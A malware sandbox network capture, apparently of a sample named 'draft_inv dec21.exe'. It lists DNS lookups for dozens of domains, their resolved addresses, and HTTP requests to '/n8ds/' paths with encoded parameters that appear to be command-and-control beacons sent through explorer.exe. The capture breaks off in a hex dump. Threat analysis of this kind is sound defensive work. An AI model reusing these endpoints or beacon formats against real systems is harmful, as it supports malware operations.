Dec 1, 2021 10:32:46.873445988 CET	192.168.11.20	9.9.9.9	0x3b73	Standard query (0)	statuswar.info	A (IP address)	IN (0x0001)
Dec 1, 2021 10:33:52.592293024 CET	192.168.11.20	9.9.9.9	0xcef2	Standard query (0)	www.ayudavida.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:33:58.463874102 CET	192.168.11.20	9.9.9.9	0xd636	Standard query (0)	www.quickcoreohio.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:03.571842909 CET	192.168.11.20	9.9.9.9	0xb3ea	Standard query (0)	www.wordpresshostingblog.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:08.774692059 CET	192.168.11.20	9.9.9.9	0x1835	Standard query (0)	www.luxalbridi.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:14.085139036 CET	192.168.11.20	9.9.9.9	0x6723	Standard query (0)	www.apps365.one	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:19.849370956 CET	192.168.11.20	9.9.9.9	0xb48b	Standard query (0)	www.receiptpor.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:25.473534107 CET	192.168.11.20	9.9.9.9	0xf25f	Standard query (0)	www.writingmomsobitwithmom.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:30.768971920 CET	192.168.11.20	9.9.9.9	0x5988	Standard query (0)	www.growebox.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:31.783941031 CET	192.168.11.20	1.1.1.1	0x5988	Standard query (0)	www.growebox.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:36.961976051 CET	192.168.11.20	1.1.1.1	0x4631	Standard query (0)	www.dif-directory.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:42.047966003 CET	192.168.11.20	1.1.1.1	0x8ed	Standard query (0)	www.avto-click.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:48.562439919 CET	192.168.11.20	1.1.1.1	0x79f0	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:49.576936960 CET	192.168.11.20	9.9.9.9	0x79f0	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:50.118932962 CET	192.168.11.20	9.9.9.9	0x79f0	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:56.622905016 CET	192.168.11.20	9.9.9.9	0xa11	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:56.989995956 CET	192.168.11.20	1.1.1.1	0xa11	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:07.167642117 CET	192.168.11.20	9.9.9.9	0xe0d2	Standard query (0)	www.mariforum.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:12.665761948 CET	192.168.11.20	9.9.9.9	0x1ff6	Standard query (0)	www.effective.store	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:17.977154016 CET	192.168.11.20	9.9.9.9	0x1ca2	Standard query (0)	www.testwebsite0711.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:31.271440983 CET	192.168.11.20	9.9.9.9	0x9f2e	Standard query (0)	www.csenmoga.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:41.378674030 CET	192.168.11.20	9.9.9.9	0x2e4b	Standard query (0)	www.recruitresumelibrary.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:46.612178087 CET	192.168.11.20	9.9.9.9	0x5ffb	Standard query (0)	www.dczhd.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:51.985929012 CET	192.168.11.20	9.9.9.9	0x7b8	Standard query (0)	www.gdav130.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:57.452815056 CET	192.168.11.20	9.9.9.9	0xe2a5	Standard query (0)	www.dubaicars.online	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:02.982851028 CET	192.168.11.20	9.9.9.9	0xd92e	Standard query (0)	www.mackthetruck.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:08.575474024 CET	192.168.11.20	9.9.9.9	0x17d1	Standard query (0)	www.jobl.space	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:23.931282043 CET	192.168.11.20	9.9.9.9	0xc6c5	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:24.946508884 CET	192.168.11.20	1.1.1.1	0xc6c5	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:25.961668968 CET	192.168.11.20	9.9.9.9	0xc6c5	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:26.121256113 CET	192.168.11.20	1.1.1.1	0xc6c5	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:31.351963997 CET	192.168.11.20	9.9.9.9	0x902c	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:31.418046951 CET	192.168.11.20	1.1.1.1	0x902c	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:52.597315073 CET	192.168.11.20	9.9.9.9	0xa199	Standard query (0)	www.testwebsite0711.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:03.281949043 CET	192.168.11.20	9.9.9.9	0x29f1	Standard query (0)	www.ozattaos.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:08.859380007 CET	192.168.11.20	9.9.9.9	0x134f	Standard query (0)	www.littlefishth.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:09.077161074 CET	192.168.11.20	1.1.1.1	0x134f	Standard query (0)	www.littlefishth.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:14.342346907 CET	192.168.11.20	9.9.9.9	0x358f	Standard query (0)	www.tvterradafarinha.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:19.372097969 CET	192.168.11.20	9.9.9.9	0x9c4a	Standard query (0)	www.smartam6.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:24.402618885 CET	192.168.11.20	9.9.9.9	0xb790	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:24.620625973 CET	192.168.11.20	1.1.1.1	0xb790	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:25.635932922 CET	192.168.11.20	9.9.9.9	0xb790	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:27.651160002 CET	192.168.11.20	1.1.1.1	0xb790	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:27.651196003 CET	192.168.11.20	9.9.9.9	0xb790	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:28.091867924 CET	192.168.11.20	9.9.9.9	0xb790	Standard query (0)	www.3uwz9mpxk77g.biz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:37.118721962 CET	192.168.11.20	9.9.9.9	0xc9b5	Standard query (0)	www.yghdlhax.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:42.133161068 CET	192.168.11.20	9.9.9.9	0x2c5c	Standard query (0)	www.photon4energy.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:47.147453070 CET	192.168.11.20	9.9.9.9	0x6ac9	Standard query (0)	www.cmoigus.net	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:02.441134930 CET	192.168.11.20	9.9.9.9	0xde0b	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:02.659101963 CET	192.168.11.20	1.1.1.1	0xde0b	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:03.674535036 CET	192.168.11.20	9.9.9.9	0xde0b	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:03.745764017 CET	192.168.11.20	1.1.1.1	0xde0b	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:03.936738968 CET	192.168.11.20	1.1.1.1	0xde0b	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:09.049036980 CET	192.168.11.20	9.9.9.9	0x5a8f	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:09.069972038 CET	192.168.11.20	1.1.1.1	0x5a8f	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:29.731554031 CET	192.168.11.20	9.9.9.9	0x5b77	Standard query (0)	www.testwebsite0711.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:52.179902077 CET	192.168.11.20	9.9.9.9	0xbdac	Standard query (0)	www.fatima2021.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:57.522468090 CET	192.168.11.20	9.9.9.9	0xbcdd	Standard query (0)	www.photon4energy.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:07.629553080 CET	192.168.11.20	9.9.9.9	0x5a04	Standard query (0)	www.inklusion.online	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:12.753325939 CET	192.168.11.20	9.9.9.9	0xebea	Standard query (0)	www.talkingpoint.tours	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:17.767942905 CET	192.168.11.20	9.9.9.9	0x8912	Standard query (0)	www.heyvecino.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:28.250144005 CET	192.168.11.20	9.9.9.9	0x9b7	Standard query (0)	www.apps365.one	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:44.293937922 CET	192.168.11.20	9.9.9.9	0xf2b6	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:44.511593103 CET	192.168.11.20	1.1.1.1	0xf2b6	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:44.623796940 CET	192.168.11.20	1.1.1.1	0xf2b6	Standard query (0)	www.abcjanitorialsolutions.com	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:51.229561090 CET	192.168.11.20	9.9.9.9	0xe3c6	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:51.255830050 CET	192.168.11.20	1.1.1.1	0xe3c6	Standard query (0)	www.braxtynmi.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:56.416148901 CET	192.168.11.20	9.9.9.9	0x3ba2	Standard query (0)	www.lopsrental.lease	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 1, 2021 10:32:46.897624016 CET	9.9.9.9	192.168.11.20	0x3b73	No error (0)	statuswar.info		162.241.120.147	A (IP address)	IN (0x0001)
Dec 1, 2021 10:33:52.766258001 CET	9.9.9.9	192.168.11.20	0xcef2	No error (0)	www.ayudavida.com		164.155.212.139	A (IP address)	IN (0x0001)
Dec 1, 2021 10:33:58.486392975 CET	9.9.9.9	192.168.11.20	0xd636	No error (0)	www.quickcoreohio.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:33:58.486392975 CET	9.9.9.9	192.168.11.20	0xd636	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:33:58.486392975 CET	9.9.9.9	192.168.11.20	0xd636	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:03.764271975 CET	9.9.9.9	192.168.11.20	0xb3ea	Name error (3)	www.wordpresshostingblog.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:08.959342957 CET	9.9.9.9	192.168.11.20	0x1835	No error (0)	www.luxalbridi.com	luxalbridi.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:34:08.959342957 CET	9.9.9.9	192.168.11.20	0x1835	No error (0)	luxalbridi.com		34.102.136.180	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:14.298508883 CET	9.9.9.9	192.168.11.20	0x6723	No error (0)	www.apps365.one		44.227.76.166	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:14.298508883 CET	9.9.9.9	192.168.11.20	0x6723	No error (0)	www.apps365.one		44.227.65.245	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:20.152492046 CET	9.9.9.9	192.168.11.20	0xb48b	No error (0)	www.receiptpor.xyz	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:34:20.152492046 CET	9.9.9.9	192.168.11.20	0xb48b	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:20.152492046 CET	9.9.9.9	192.168.11.20	0xb48b	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:20.152492046 CET	9.9.9.9	192.168.11.20	0xb48b	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:20.152492046 CET	9.9.9.9	192.168.11.20	0xb48b	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:20.152492046 CET	9.9.9.9	192.168.11.20	0xb48b	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:20.152492046 CET	9.9.9.9	192.168.11.20	0xb48b	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:20.152492046 CET	9.9.9.9	192.168.11.20	0xb48b	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:25.488063097 CET	9.9.9.9	192.168.11.20	0xf25f	No error (0)	www.writingmomsobitwithmom.com		216.250.120.206	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:31.884144068 CET	1.1.1.1	192.168.11.20	0x5988	No error (0)	www.growebox.com	growebox.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:34:31.884144068 CET	1.1.1.1	192.168.11.20	0x5988	No error (0)	growebox.com		81.2.194.128	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:33.989433050 CET	9.9.9.9	192.168.11.20	0x5988	No error (0)	www.growebox.com	growebox.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:34:33.989433050 CET	9.9.9.9	192.168.11.20	0x5988	No error (0)	growebox.com		81.2.194.128	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:36.975837946 CET	1.1.1.1	192.168.11.20	0x4631	No error (0)	www.dif-directory.xyz	dif-directory.xyz		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:34:36.975837946 CET	1.1.1.1	192.168.11.20	0x4631	No error (0)	dif-directory.xyz		185.61.153.97	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:42.357877970 CET	1.1.1.1	192.168.11.20	0x8ed	No error (0)	www.avto-click.com		185.98.5.234	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:50.118654966 CET	1.1.1.1	192.168.11.20	0x79f0	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:51.612142086 CET	9.9.9.9	192.168.11.20	0x79f0	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:51.841981888 CET	9.9.9.9	192.168.11.20	0x79f0	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:56.989509106 CET	9.9.9.9	192.168.11.20	0xa11	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:34:57.143985033 CET	1.1.1.1	192.168.11.20	0xa11	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:07.338968039 CET	9.9.9.9	192.168.11.20	0xe0d2	No error (0)	www.mariforum.com		50.118.200.120	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:12.786721945 CET	9.9.9.9	192.168.11.20	0x1ff6	No error (0)	www.effective.store		199.59.242.153	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:17.986330032 CET	9.9.9.9	192.168.11.20	0x1ca2	Name error (3)	www.testwebsite0711.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:31.285382032 CET	9.9.9.9	192.168.11.20	0x9f2e	Name error (3)	www.csenmoga.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:41.601293087 CET	9.9.9.9	192.168.11.20	0x2e4b	Name error (3)	www.recruitresumelibrary.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:46.633599043 CET	9.9.9.9	192.168.11.20	0x5ffb	No error (0)	www.dczhd.com	dczhd.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:35:46.633599043 CET	9.9.9.9	192.168.11.20	0x5ffb	No error (0)	dczhd.com		154.23.172.127	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:52.133974075 CET	9.9.9.9	192.168.11.20	0x7b8	No error (0)	www.gdav130.xyz		35.244.144.199	A (IP address)	IN (0x0001)
Dec 1, 2021 10:35:57.901051998 CET	9.9.9.9	192.168.11.20	0xe2a5	No error (0)	www.dubaicars.online		185.68.16.57	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:03.024566889 CET	9.9.9.9	192.168.11.20	0xd92e	No error (0)	www.mackthetruck.com		203.170.80.250	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:08.651695967 CET	9.9.9.9	192.168.11.20	0x17d1	Name error (3)	www.jobl.space	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:26.120920897 CET	9.9.9.9	192.168.11.20	0xc6c5	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:26.345874071 CET	1.1.1.1	192.168.11.20	0xc6c5	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:26.345932007 CET	1.1.1.1	192.168.11.20	0xc6c5	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:27.644097090 CET	9.9.9.9	192.168.11.20	0xc6c5	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:31.417742014 CET	9.9.9.9	192.168.11.20	0x902c	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:32.048674107 CET	1.1.1.1	192.168.11.20	0x902c	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:36:52.609491110 CET	9.9.9.9	192.168.11.20	0xa199	Name error (3)	www.testwebsite0711.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:03.323291063 CET	9.9.9.9	192.168.11.20	0x29f1	No error (0)	www.ozattaos.xyz		104.21.82.227	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:03.323291063 CET	9.9.9.9	192.168.11.20	0x29f1	No error (0)	www.ozattaos.xyz		172.67.164.153	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:09.218341112 CET	9.9.9.9	192.168.11.20	0x134f	No error (0)	www.littlefishth.com	littlefishth.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:37:09.218341112 CET	9.9.9.9	192.168.11.20	0x134f	No error (0)	littlefishth.com		34.102.136.180	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:09.237143993 CET	1.1.1.1	192.168.11.20	0x134f	No error (0)	www.littlefishth.com	littlefishth.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:37:09.237143993 CET	1.1.1.1	192.168.11.20	0x134f	No error (0)	littlefishth.com		34.102.136.180	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:14.367193937 CET	9.9.9.9	192.168.11.20	0x358f	Name error (3)	www.tvterradafarinha.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:19.391932964 CET	9.9.9.9	192.168.11.20	0x9c4a	Name error (3)	www.smartam6.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:28.091406107 CET	1.1.1.1	192.168.11.20	0xb790	Server failure (2)	www.3uwz9mpxk77g.biz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:28.091453075 CET	1.1.1.1	192.168.11.20	0xb790	Server failure (2)	www.3uwz9mpxk77g.biz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:37.122581005 CET	9.9.9.9	192.168.11.20	0xc9b5	Name error (3)	www.yghdlhax.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:42.141109943 CET	9.9.9.9	192.168.11.20	0x2c5c	Name error (3)	www.photon4energy.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:37:47.165062904 CET	9.9.9.9	192.168.11.20	0x6ac9	Name error (3)	www.cmoigus.net	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:03.745449066 CET	9.9.9.9	192.168.11.20	0xde0b	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:03.936310053 CET	9.9.9.9	192.168.11.20	0xde0b	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:04.044579983 CET	1.1.1.1	192.168.11.20	0xde0b	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:04.044644117 CET	1.1.1.1	192.168.11.20	0xde0b	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:04.044686079 CET	1.1.1.1	192.168.11.20	0xde0b	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:09.069571018 CET	9.9.9.9	192.168.11.20	0x5a8f	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:09.186266899 CET	1.1.1.1	192.168.11.20	0x5a8f	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:29.735654116 CET	9.9.9.9	192.168.11.20	0x5b77	Name error (3)	www.testwebsite0711.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:52.254117966 CET	9.9.9.9	192.168.11.20	0xbdac	No error (0)	www.fatima2021.com	fatima2021.brizy.site		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:38:52.254117966 CET	9.9.9.9	192.168.11.20	0xbdac	No error (0)	fatima2021.brizy.site	previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:38:52.254117966 CET	9.9.9.9	192.168.11.20	0xbdac	No error (0)	previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com		34.237.47.210	A (IP address)	IN (0x0001)
Dec 1, 2021 10:38:57.526416063 CET	9.9.9.9	192.168.11.20	0xbcdd	Name error (3)	www.photon4energy.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:07.719265938 CET	9.9.9.9	192.168.11.20	0x5a04	No error (0)	www.inklusion.online		3.64.163.50	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:12.757158995 CET	9.9.9.9	192.168.11.20	0xebea	Name error (3)	www.talkingpoint.tours	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:17.798168898 CET	9.9.9.9	192.168.11.20	0x8912	No error (0)	www.heyvecino.com	heyvecino.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 10:39:17.798168898 CET	9.9.9.9	192.168.11.20	0x8912	No error (0)	heyvecino.com		34.102.136.180	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:28.452843904 CET	9.9.9.9	192.168.11.20	0x9b7	No error (0)	www.apps365.one		44.227.76.166	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:28.452843904 CET	9.9.9.9	192.168.11.20	0x9b7	No error (0)	www.apps365.one		44.227.65.245	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:44.623514891 CET	9.9.9.9	192.168.11.20	0xf2b6	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:46.222630978 CET	1.1.1.1	192.168.11.20	0xf2b6	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:46.222697020 CET	1.1.1.1	192.168.11.20	0xf2b6	Server failure (2)	www.abcjanitorialsolutions.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:51.255513906 CET	9.9.9.9	192.168.11.20	0xe3c6	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:51.406645060 CET	1.1.1.1	192.168.11.20	0xe3c6	Server failure (2)	www.braxtynmi.xyz	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 10:39:56.480251074 CET	9.9.9.9	192.168.11.20	0x3ba2	No error (0)	www.lopsrental.lease		66.29.140.185	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

statuswar.info

www.ayudavida.com

www.quickcoreohio.com

www.luxalbridi.com

www.apps365.one

www.receiptpor.xyz

www.writingmomsobitwithmom.com

www.growebox.com

www.dif-directory.xyz

www.avto-click.com

www.mariforum.com

www.effective.store

www.dczhd.com

www.gdav130.xyz

www.dubaicars.online

www.mackthetruck.com

www.ozattaos.xyz

www.littlefishth.com

www.fatima2021.com

www.inklusion.online

www.heyvecino.com

www.lopsrental.lease

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49790	162.241.120.147	443	C:\Users\user\Desktop\draft_inv dec21.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49791	164.155.212.139	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:33:52.934317112 CET	450	OUT	GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4 HTTP/1.1 Host: www.ayudavida.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:33:53.591156006 CET	451	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:33:53 GMT Content-Type: text/html; charset=gbk Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 Location: /404.html Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49800	50.118.200.120	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 10:35:07.498178959 CET	469	OUT	GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1 Host: www.mariforum.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 10:35:07.659982920 CET	470	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 Dec 2021 09:34:58 GMT Content-Type: text/html Content-Length: 801 Connection: close Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e c7 e0 ba a3 b4 c8 c1 b1 b2 cd d2 fb b9 dc c0 ed d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 